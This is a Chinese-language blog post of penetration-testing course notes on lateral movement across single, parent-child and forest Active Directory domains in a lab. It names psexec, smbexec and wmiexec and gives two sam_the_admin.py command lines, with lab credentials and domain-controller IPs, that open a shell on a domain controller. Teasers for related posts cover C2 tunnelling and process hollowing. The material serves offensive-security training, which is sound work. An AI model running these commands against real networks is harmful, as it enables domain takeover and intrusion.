EthanDoctor

内网对抗-横向移动篇&单域&父子域&域林&域森林&打点及信任&入口手法差异&思路方案

Ethan医生3个月前系统安全121

 横向移动-信息收集-单域&父子域&域森林

 横向移动-口令协议-单域&父子域&域森林

 横向移动-域控提权-单域&父子域&域森林

单域&父子域&域森林环境下:

1、多域信息收集差异

XDORG(xiaodi.org)

HRXRORG(hr.xiaodi.org)

HHRORG(h.hr.xiaodi.org)

GAXDORG(ga.xiaodi.org)

GGAORG(h.ga.xiaodi.org)

XIAODI8(xiaodi8.org)

 

2、口令协议横向移动差异(只要口令是对的 同网段所有的域机器都可以登入)

psexec smbexec wmiexec等

 

3、域控提权横向移动差异

python sam_the_admin.py hhrorg/'hhrpc:admin!@#45' -dc-ip 192.168.139.35 -shell

python sam_the_admin.py xdorg/'test:admin!@#45' -dc-ip 192.168.139.11 -shell

 

4、入口跳板机与打点及横向移动思路相呼应

场景1:入口机在h.hr.xiaodi.org下

场景2:入口机在hr.xiaodi.org下

场景2:入口机在xiaodi8.org下


标签: 横向移动篇
返回列表

上一篇:内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

下一篇:内网对抗-横向移动篇&工作组局域网&中间人攻击&ARP欺骗&DNS劫持&单双向&断网截获

相关文章

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决解决:信息收集打点和漏洞利用部分注意:配置连接IP为C2服务器IP工具:Proxifier Proxychains等Proxifier使用:直接看课程演...

免杀对抗-C2远控篇&C&C++&APC注入&进程镂空&傀儡进程&伪装欺骗&指纹特征消除

➢ C2远控-红队技能-进程镂空&傀儡进程➢ C2远控-红队技能-APC注入&进程欺骗#C2远控-ShellCode-认知&环境1.创建工程时关闭SDL检查...

内网对抗-隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线

➢ 内网穿透-C2上线-Frp&NPS&Chisel➢ 内网穿透-Socks建立-Frp&NPS&Chisel➢ 内网穿透-端口映射转发-...

内网对抗-横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破

内网对抗-横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破

#首要知识点:pass the hash(哈希传递攻击,简称pth)pass the ticket(票据传递攻击,简称ptt)pass the key(密钥传递攻击,简称ptk)PTH(pass th...

内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

➢ C2上线-多平台系统-CrossC2项目➢ 隧道技术-SSH转发-出站限制&信息收集➢ 隧道技术-HTTP反向-出站限制&信息收集&上线#HT...

Linux系统权限提升篇&Vulnhub&辅助项目&SUID权限&SUDO指令&版本漏洞

139#信息收集当前主机的操作系统hostnamectlcat /etc/*-releaselsb_release -acat /etc/lsb-release # Debaincat /etc/re...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号